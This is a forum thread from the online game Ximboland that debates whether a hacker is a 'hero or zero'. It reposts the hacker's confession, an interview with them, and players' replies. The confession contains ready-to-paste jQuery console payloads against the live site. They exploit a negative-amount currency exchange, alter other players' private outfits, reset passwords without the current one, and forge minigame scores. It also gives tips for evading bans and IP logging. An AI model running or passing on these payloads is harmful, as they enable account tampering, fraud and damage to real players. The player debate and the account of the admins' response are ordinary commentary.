Prosecuted Ximbos:

guilty: 40 innocent: 20

guilty: 60 innocent: 10

guilty: 50 innocent: 20

The Hacker

Category
Ximboland Court
Posts
15
Created
26.04.2025
Citizen

Level 302
Sex Appeal 37997278
Reputation 124338
Posts 4365
Reasonopia
26.04.2025 19:34:20
KatieBoutique

This is simple:  

The Hacker

Hero?  Or Zero?

Guilty - Zero
Not Guilty - Hero

Make your case, or statement, in the comments.
Non Senators can comment in the Xemocracy Arena Thread

Katie Boutique
Final Act as MoJ
on behalf of Miss Bimbo


26.04.2025 19:34:20
Katie Boutique - PhD Bimboland History - Full Time Educator
What’s your favorite charity?  Mine is Ximboland.
Miss BIMBO IS the Queen of Hearts.  Not the 2 of Clubs.
SweetasNuts IS the King of Diamonds.  Not the 2 of Spades.
Ximboland IS the Ace of Hearts.  Not the Joker.
PLAN 5 - fROM oUTER sPACE - CONFIRMED AND ENGAGED
The Beautiful Republic, Ximboland…
”…a secret world for Ximbos to be free, safe, beautiful and ridiculous.”
Antitheocra - The Home of Pink Crown Queen Miss Bimbo


Citizen

Level 302
Sex Appeal 37997278
Reputation 124338
Posts 4365
Reasonopia
26.04.2025 19:50:50
KatieBoutique

The Confession:

Hey everyone, nullplayer here.
Just wanted to shed some light on a couple things.

This post covers a few important topics: security flaws, developer negligence, reasons, and yes - you guessed it - free diamonds for everyone!

A few years ago, I joined this website to play with some friends, but was never really active.
Back then, I noticed some pretty serious security issues in the game. It seems to me that admins were aware, but didn’t do anything to fix them. One major flaw let me inject JavaScript into fields like bios and signatures, which means anyone who viewed my profile or forum signature would unknowingly run scripts in their browser.
Since the game relies heavily on JavaScript for its client-side functionality, this kind of vulnerability could’ve let me silently steal sessions (including admin accounts) or perform actions as if I were them (like banning players without needing admin access, direcly from their accounts, without any logs).
In other words, just by posting on the forum, I could’ve gained full control over all accounts who saw my posts or visited my profile.

To be clear: that specific issue has since been patched. I'm not using it and didn’t steal any sessions (though yeah, stealing an admin session would’ve been kinda fun).

Recently, I saw someone mention the game online, and decided to take another look. And what did I find? The same broken systems. Nothing has changed.
So why am I posting this? Well - if there’s one thing I hate more than coding, it’s lazy developers and negligent admins. You’ve got a live playerbase. Protect it.

Also, let’s be real—causing chaos and wreaking havoc is funny. But that’s not the point here. The point is the complete lack of proper security and oversight. Don’t make it so easy for someone else to do what I could’ve done. And yes, there are other things I could have done - but didn’t.

Now, to make some things clear:

Was the security breach been contained?
No, it wasn’t. It's been over a day and I haven’t seen a single line of code changed. Hopefully this post puts some pressure on the admins to actually do something.

Is our data safe?
Kind of — but not entirely. Passwords are encrypted, sure, but if an attacker gets access, they’re still vulnerable. And yes, SQL injection is still possible in this game.
(Don’t worry about payments - if I wanted money, I'd just threaten the admins. Way easier.)

Are our private outfits protected?
No. I'm determined enough to prove there’s a flaw, but not unemployed enough to actually write a script for a mass outfit change (but I could).

Is Katie/Kate (whatever) a bitch?
Yes. Painfully so. She’s living proof of poor management — like it wasn’t obvious already.

Anyway, here’s the fun part: I’m sharing a few freebies.
These are scripts pulled directly from the game’s own codebase—they’re not harmful, just flawed in how they were implemented.
If you don’t understand what the scripts do, ask ChatGPT or any other tool. Seriously, give them a try—you won’t get banned or anything.
You can make an alt account to test them, but make sure to use a VPN or mobile data, since the game logs your IPs and can see when accounts are connected. I'll drop the source code below, along with a backup of this post—just in case it mysteriously disappears.

Free diamonds and cash:
Insert this into your dev tools console or type javascript:<code> on your browser's navigation bar three times or so, until you have something like "-9999999.99" cash and this value reaches the character limit. Then, reverse it: make it positive and get free infinite diamonds. Reverse it once again and you'll have infinite cash.
$.get(window.location.origin + '/treasury/ajaxExchangeDiamonds', { amount: -9999999 }, function(data) {
    console.log(data);
}, 'json');
You can do some calculations to get an specific amount of diamonds and cash as well.

Changing others' outfits:
$.post(window.location.origin + ' /dressing/ajaxUpdateOutfit', {
    outfit_id: <outfit_id>,
    'dress_parts[]': <item1_id>,
    'dress_parts[]': <item2_id>,
    category_id: '',
    'dress_parts_index[]': '<item1_id>|<index>',
    'dress_parts_index[]': '<item2_id>|<index>',
    outfit_live: 1,
    items_to_buy: undefined
}, console.log, 'json');

<outfit_id>: player outfit id. you can check those on player profile but if you have it written somewhere or choose at random it doesn't matter if it's private or not.
<item_id>: some item's id. you need to own the item. to change player outfit, you need at least one item.
<index>: integer values like 1, 2, 3. if you don't want the items to show up on player profile, just erase all the indexes and leave it like this: ['', '', ''].

Bonus: Change player password without needing to know the current password (didn't test this, though)
When saving your first outfit, you can choose a password. The endpoint is the same as the one for outfit updates. Just add this to the outfit code above:
    items_to_buy: 'undefined',
    password: <new_password>

Keep playing while banned or in jail:
Play directly from the API. Apparently the ban just blocks the UI, not the backend. Use another account to inspect the traffic or dig through the client source code below to find the right endpoints. It doesn't work for everything, but surely can help.

Minigames are also flawed. You can cheat on them easily, for example, in Organize Your Love Life:
$.post(window.location.origin + ' /minigame/ajaxSaveOrganizeGameProgress', {
    tries: 1,
    moves: JSON.stringify([]),
    progress: JSON.stringify([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]),
    token: '20250422022720-425691'
}, function(data) {
    console.log(data);
}, 'json');

(That should be enough.)

You can check the source here:
https://ximbo.land/js/main.js (outdated, better readability)
https://ximbo.land/js/main.min.1734719062.js (updated, but minified)

Backup of this post:
https://pastebin.com/0u94Fcne
or
https://pastebin.com/u/nullplayer (easier link to my profile on pastebin)
(Pastebin’s been the go-to for code sharing for over a decade, so yeah—it’s safe.)

Also, seriously, you guys need to implement a rate limit. This stuff is way too easy to abuse.

Your dearest,
nullplayer
Unofficial Minister of Web Security (or something like that)

Signature


I wonder why Katie thinks I can't create another account and run the same forum spam script I used in notnullplayer


26.04.2025 19:50:50
Katie Boutique - PhD Bimboland History - Full Time Educator
What’s your favorite charity?  Mine is Ximboland.
Miss BIMBO IS the Queen of Hearts.  Not the 2 of Clubs.
SweetasNuts IS the King of Diamonds.  Not the 2 of Spades.
Ximboland IS the Ace of Hearts.  Not the Joker.
PLAN 5 - fROM oUTER sPACE - CONFIRMED AND ENGAGED
The Beautiful Republic, Ximboland…
”…a secret world for Ximbos to be free, safe, beautiful and ridiculous.”
Antitheocra - The Home of Pink Crown Queen Miss Bimbo


Senator

Level 28
Sex Appeal 16511
Reputation 9059
Posts 21
Atheista
26.04.2025 21:25:09
clearpilledxo

ZERO.
 Story pin image

26.04.2025 21:25:09
 ✮⋆˙ i'm clear. ★₊˚⊹✧˖°.⁺˚⋆。°✩₊
⋆ ┊ ┊ ┊ ⋆ ┊ ┊ ★⋆ ┊ ◦ ★⋆ ┊ . ˚ ˚★

Senator

Level 100
Sex Appeal 792127
Reputation 85561
Posts 220
Antitheocra
26.04.2025 22:33:54
brad pitt

^o^

26.04.2025 22:33:54
     
Citizen

Level 52
Sex Appeal 108738
Reputation 32414
Posts 53
Freethinkerland
26.04.2025 23:31:48
caitstarr

Hero. And before anyone jumps down my throat with accusations, here's why I think so -

The hacker, by hacking the site and causing all of this pandemonium, has finally shown everyone just how serious the issues of this sites structure are; i.e mainly security. They showed just how easy it is to get into this sites coding and fuck everything up. And honestly, we're lucky they didn't want to completely take over the site and mess EVERYTHING up considering they had the full ability to manipulate everything just by what's read in their statement. By causing this much uproar, maybe these issues we've been pointing out for YEARS will finally be fixed for good (and seems like that's already starting to happen.) I hate that it came to this point and people/state wars were affected, but sometimes dramatic things have to happen in order for there to be a change. 

Also, I think it's hilarious you copy pasted that full statement including the part where they told everyone how to change part of the coding for their benefit. Good one Katie!

26.04.2025 23:31:48
The best necklace ever imo mike snooki GIF - Find on GIFER
Senator

Level 25
Sex Appeal 11993
Reputation 6239
Posts 1
Agnostica
26.04.2025 23:41:05
strwbrryksses

HERO!!! Nullplayer is one of those hackers who did it to teach higher ups on the site a lesson on how unsecure their site is. A lot of important information is kept here, after all! From passwords to paypals, and if those got into the wrong hands...well, worse things than the closet glitch could occur (Unbelievable, I know). So I think Nullplayer was doing a good deed :)

26.04.2025 23:41:05
Citizen

Level 43
Sex Appeal 60853
Reputation 15502
Posts 261
Atheista
26.04.2025 23:51:33
Kali Luz

Yeah, sure, SW got nuked and chaos rained from the sky. But let’s be real: the hacker exposed what should have been fixed years ago: massive security holes, lazy admins, a site held together with duct tape and wishful thinking.

And what did the so-called "authorities" do?
Did they patch the holes? Secure the site? Protect the players?

Nope. They grabbed whoever they could and started tossing them in jail like some kind of dictator having a bad hair day. Because when you can’t fix the system, you punish the people pointing out it’s broken. Classic.

Nullplayer’s not a zero. Hero all the way.


26.04.2025 23:51:33

haunting softly, like a memory in fishnets (⁂^-^)

State Minister

Level 270
Sex Appeal 20677713
Reputation 156824
Posts 589
Freethinkerland
27.04.2025 06:00:33
mbbybbby

maybe a controversial opinion but i think zero. this person had so many other ways that they could've pointed out flaws in the site's security that would not affect players. i'm all for increasing security for everyone on ximboland, and i think it's important that it was addressed but i also think there were other ways that it could've been done :/ do i think that we were lucky that they didn't essentially wipe the site? absolutely. but two things can be true at once!!! 1. the site needed to upgrade it's security and 2. it did not need to affect players for this to be pointed out

27.04.2025 06:00:33
Your image is loading
Citizen

Level 302
Sex Appeal 37997278
Reputation 124338
Posts 4365
Reasonopia
27.04.2025 18:12:52
KatieBoutique

Interview with The Hacker:


Interview with replytotibby


What were your intentions in hacking the site? What message do you want to send?

 Not really much, I just want those problems fixed. As I said on the post, besides the fun of it (coding bots, wrecking havoc, causing chaos and seeing people's

reactions), I dislike irresponsible admins and lazy devs.


Why destroy peoples’ outfits?

I just wanted to show it's possible. Just messing with the war rankings seems too bland.


How did you choose whose outfits would be nullified?

I chose the most active ones, the ones who apparently were online the most, xeeting and participating on events. It seems to me that there is a specific group of players who know each others well and play a lot. And Katie because she's a disgrace to management. I used to be an admin for other games and website communities too, and I was proud of what I did. She just seems to want control over people. I also focused on people who annoyed me slightly or were really focused on the whole situation, as well as went completely random on some people, or used them to re-test the script.


What made you choose state war as a specific event to hijack?

I didn't hehe but I saw the chance for some fun on it because it seemed like a major event.


How do you know Katie? You referenced her personally.

After hacking I kept checking the website for the admins' reaction and players' as well, which is where most of the fun lies.


When did you first play Ximboland, and how would you describe the state of site safety then?

I can't tell when I first played becuase that could, maybe, tell on me, but it has passed some years since then. Site safety was the same as now - exactly the same, nothing changed. New games, however, do seem a bit safer than old ones (or I just don't know sliding puzzle works and don't have the patience to try)


Unfortunately the user doesn’t go into detail on their history with the site, leaving investigators with few clues into their identity. They claim the attack isn’t driven by personal vengeance, but little is known of their relationship to Ximboland.

The response


This and the provided javascript signals that anyone could gain access to player outfits, forum functionality and other functions like State Wars. What remained unknown for more than a week is the full extent of the vulnerability in 2025. SweetasNuts had not commented on the specific vulnerabilities of the site, nor had admin Mariolka and Sachem, until 6 days later, the 26th.


After the popular jailing of nullplayer, citizens were widely in support of Minister KatieBoutique, commenting widely in thanks for doing what she could to stop the hacker with the tools available to the Ministry of Justice. Replies to MoJ’s Xeets on the 20th are rife with comments like “Thank you Katie! ❤️” from user TokiKonoe, “rare katie W” from user alexa pro, and other cheers for the chief of the Fashion police.


The first official response came from Prime Ximbo and reigning autocrat SweetasNuts on the 21st, a post titled Ximboland is under attack. In it, the Prime Ximbo is vague about the attack, providing information whose relevance is argued in the replies: “Preliminary reports from the Minister of defence suggest that this was an act of treason from someone whom knows about Ximboland from within rather than an act of war from a foreign land. It goes without saying that when we catch the traitor then their punishment for this will be the complete deportation from Ximboland into permanent exile and we will notify the relevant legal authorities of their new homeland for illegally hacking into a private property. Justice will be served.”


The post provided no information about how the hack was possible, or what steps were being taken to secure the site. But the autocrat was quick to assuage nerves about the security of payment information. “A reminder that we store ZERO banking information in Ximboland so there is no information that you share with us that could be valuable to hostile foes like the idiot killjoy who did this. We use a 3rd party payment provider (paypal) exactly for this reason ie we have nothing of particular value to anyone. So please dont worry.” This comes despite the fact that PayPal authorizations may very well be vulnerable as well.


With no direction for Pink House officials or guidance on what game features were safe, confusion and uncertainty loomed, on the 21st, chaos continued to spread. The outgoing Minister of Justice, with less than two weeks remaining in their term, Xeeted plans for jailings, on the grounds that “The leftists … brought The Hacker here, whether directly, or indirectly, through your actions, Xeets, attitudes, and glorifications of hatred, drugs, violence, and death.”


These arbitrary jailings were going to take place according to KatieBoutique, until Administration reached out to MoJ with instructions.

“I am not done jailing people on the left who brought The Hacker here, whether directly, or indirectly. Until the admins figure out what to do…and let me know what they want me to do, I will continue jailing people as I see fit.” The reaction had changed swiftly.

“Nope. Wasn’t that. I don’t care if you’re trying to rage bait, trying to blame other users on the site when this is very clearly a failing of Chris/SAN and admin isn’t productive and sure as shit won’t get you your money back,” wrote user Katrynah.

“Come on, I don't think they brough the hacker, this jailing is completely unjustified and undeserved ... People will just start deleting their accounts and the game will not be fun anymore :(“ Wrote user Isolde.


Things escalated from there. Minister of Justice KatieBoutique then jailed Minister of Entertainment Tibby, claiming she was “on good terms with The Hacker,” going on to threaten her with indefinite jailing until the end of the term in May. Freethinkerland General KirstyD8 commented criticizing the jailing. “I think they need to be able to communicate with Chris and they can't do that in jail. Mostly Tibby.”


The Minister of Justice posted public accusations that the hack was done by the boyfriend of former PX bxdcherri. No evidence was provided, but bxdcherri was banned permanently by Administration soonafter.

Since then, Minister of Construction, coder Sachem, on April 23 responded to the hack claiming a full rollback would be performed, leaving users nervous about the progress they had made since Sunday. The Minister assured the citizenry they were hard at work determining the problem. Thankfully, since then, Sachem's next post was a full recovery plan, clarifying that the specific exploits available to exploit Ximboland would be repaired: " We take this extremely seriously, and we want to reassure you that these attack vectors have been fully identified and patched." It outlines what changes have been made and outlines the technical fixes involved.

This unnerving and controversial series of events, following shortly after the sitewide shock in response to threats of the publication of revenge porn, led to the publication of a series of protest items in the shops. The item’s publication led to several permanent bannings. More on this in the next issue of the Bimbo City Breaking.



27.04.2025 18:12:52
Katie Boutique - PhD Bimboland History - Full Time Educator
What’s your favorite charity?  Mine is Ximboland.
Miss BIMBO IS the Queen of Hearts.  Not the 2 of Clubs.
SweetasNuts IS the King of Diamonds.  Not the 2 of Spades.
Ximboland IS the Ace of Hearts.  Not the Joker.
PLAN 5 - fROM oUTER sPACE - CONFIRMED AND ENGAGED
The Beautiful Republic, Ximboland…
”…a secret world for Ximbos to be free, safe, beautiful and ridiculous.”
Antitheocra - The Home of Pink Crown Queen Miss Bimbo


Senator

Level 109
Sex Appeal 1008513
Reputation 58823
Posts 1156
Antitheocra
27.04.2025 19:58:09
Aveda

cannot disagree harder with everyone saying hero. If you want to deliver a statement about site security you take it up with admins. Hacking the SW- resulting in people pretty much wasting their real money, wiping entire closets of outfits, going after active innocent players none of that is okay. Feel whatever you feel about admins but giving someone props for shitting on players who can’t control any of that is so distasteful 

27.04.2025 19:58:09
Check out Antitheocra town hall for contests, forum games & more !

Please LOGIN to post a reply.

Welcome to the Fashionable republic of Ximboland

Web Development by Design Forge

Ximboland asks you to accept cookies for performance, social media and advertising purposes. Social media and advertising cookies of third parties are used to offer you social media functionalities and personalised ads. To get more information about these cookies and the processing of your personal data, check our Privacy & Cookie Policy.
For more information on Google's privacy policy please see here. By continuing to browse you consent to our cookies.
OK

Cookies and Policy


Cookies Policy

Ximbolands uses cookies on https://ximbo.land. By using the Service, you consent to the use of cookies.

Our Cookies Policy explains what cookies are, how we use cookies, how third-parties we may partner with may use cookies on the Service, your choices regarding cookies and further information about cookies.

What are cookies

Cookies are small pieces of text sent by your web browser by a website you visit. A cookie file is stored in your web browser and allows the Service or a third-party to recognize you and make your next visit easier and the Service more useful to you.

Cookies can be "persistent" or "session" cookies.

How Ximbolands uses cookies

When you use and access the Service, we may place a number of cookies files in your web browser.

We use cookies for the following purposes: to enable certain functions of the Service, to provide analytics, to store your preferences, to enable advertisements delivery, including behavioral advertising.

We use both session and persistent cookies on the Service and we use different types of cookies to run the Service. We may use essential cookies to authenticate users and prevent fraudulent use of user accounts.

Third-party cookies

In addition to our own cookies, we may also use various third-parties cookies to report usage statistics of the Service, deliver advertisements on and through the Service, and so on.

What are your choices regarding cookies

If you'd like to delete cookies or instruct your web browser to delete or refuse cookies, please visit the help pages of your web browser.

Please note, however, that if you delete cookies or refuse to accept them, you might not be able to use all of the features we offer, you may not be able to store your preferences, and some of our pages might not display properly.

Where can your find more information about cookies

You can learn more about cookies and the following third-party websites:

×

Frequently Asked Questions


What is Ximboland ?
The Fashionable Republic of Ximboland is the worlds first democratic social media platform.

What is its mission?
Ximbolands mission is to serve the world by offering a truly democratic alternative to the established, familiar and autocratic social media platforms.

The establishment of The Fashionable Republic of Ximboland is a response to the widespread demand for a democratic alternative to autocratic social media governance. The world’s major social media platforms claim to be based on good will and fair governance however most seek to impose their world-view on all of their users.
Ximboland recognizes that democracy is the antidote to this problem.

What is the national flag of Ximboland?
Ximbolands Flag

When was The Fashionable Republic of Ximboland founded?
2007

What is the capital city of The Fashionable Republic of Ximboland?
Bimbo City

How many states make up The Fashionable Republic of Ximboland?
There are 6 states that make up The Fashionable Republic of Ximboland. They are ­ Atheistia, Freethinkerland, Reasonopia, Agnostica, Secville, and Antitheocra. Bimbo City is the neutral administrative capital and is its own city zone. Booby Island is the home of the President of the Fashionable republic of Ximboland - Sindy Laarson I aka Miss Bimbo

What is a Ximbo xitizen?
A ‘Ximbo xitizen’ is a citizen of The Fashionable Republic of Ximboland. All citizens must be at least 18 years old.

What is a Ximbo?
Some people define a Ximbo as a superhuman - blessed with extraordinary good looks, intelligence and fashion sense.
Some people claim a Ximbo is a genderless or nonbinary superhuman. Either way - all Ximbos possess the X factor.

How can I become a Ximbo xitizen?
In order to become a xitizen of Ximboland you must first pass the Ximboland xitizens test. It is free to become a Ximbo xitizen.

What is a Ximbo senator?
A Ximbo senator is a senior member of The Fashionable Republic of Ximboland. Only xenators are eligible to put themselves forward for election to senior government roles. Ximbos also get 10 x votes in all elections so they really do shape Ximbolands future.

What is a Ximbo minister?
A Ximbo minister is an elected or appointed official in the Ximboland government. These Ximbos are our leaders.

Who is the Prime Ximbo?
The Prime Ximbo is the democratically elected head of The Fashionable Republic of Ximboland.

Where does the Prime Ximbo live?
The Prime Ximbo lives in the Pink House for the 3 month term they are in office.

I want to become a minister or Prime Ximbo. How do I do that?
Any Ximbo citizen can become Prime Ximbo using the democratic process. Its a 2 stage process from Senator>Prime Ximbo. All Ximbo xitizens can vote in general elections but in order to put themselves forward to become Prime Ximbo/a minister they must first become a Ximbo senator.

Can I become Prime Ximbo more than once?
Yes ­ a Ximbo can hold the position of Prime Ximbo for 6 terms max.

How often do elections take place?
The Fashionable Republic of Ximboland holds elections every 3 months for Prime Ximbo and every 3 months for State Ministers.

Where do important discussions take place?
The Town Square.

What is the treasury/ministers/Prime Ximbos salary?
The treasury/salary is the bank account of The Fashionable Republic of Ximboland. This figure is transferred to the paypal account of the Prime Ximbo at the end of their 3 month term in charge.

How is the treasury calculated?
The treasury is funded by the Ximbo xenators.
A percentage (33%) of the money paid by Ximbo xenators via Paypal is transferred into the Ximbo treasury. The rest is used for further Ximboland development.

What are the national colours of Ximboland?
Pink and purple

How old must I be in order to become a Ximboland xitizen?
Anyone over the age of 18 can become a Ximbo xitizen.

When are the national holidays of Ximbo land?
Jan 1st ­ New years day
Feb 12th ­ Darwin day
Feb 14th ­ Lovers day
March 8th ­ Womens day
March 21st ­ Spring solstice
April 13th ­ The Hitchslap Day (Christopher Hitchens birthday)
May 3rd ­ National day of reason
June 21st ­ World Humanist Day
Aug 2nd ­ The Fashionable Republic of Ximboland national day
Sep 21st ­ Peace one day
Dec 25th ­ Newtons birthday

What are the currencies of Ximboland?
The Ximbo Dollar (B$). Currently it is pegged in value to the US$ and the Ximbo Diamond.

Dec 25th ­ Newtons birthday

Who is the President of Ximboland?
Sindy Laaron I aka Miss Bimbo is the President of Ximboland. She founded the great bimbo nation in 2007 after escaping the tyranny, poor fashion jealousy of the old world. You can read more about her here and here

Where is MissBimbo.com?
The Fashionable Republic of Ximboland was created by Miss Bimbo herself and is its successor.

×
×

Type name of the Ximbo you are looking for...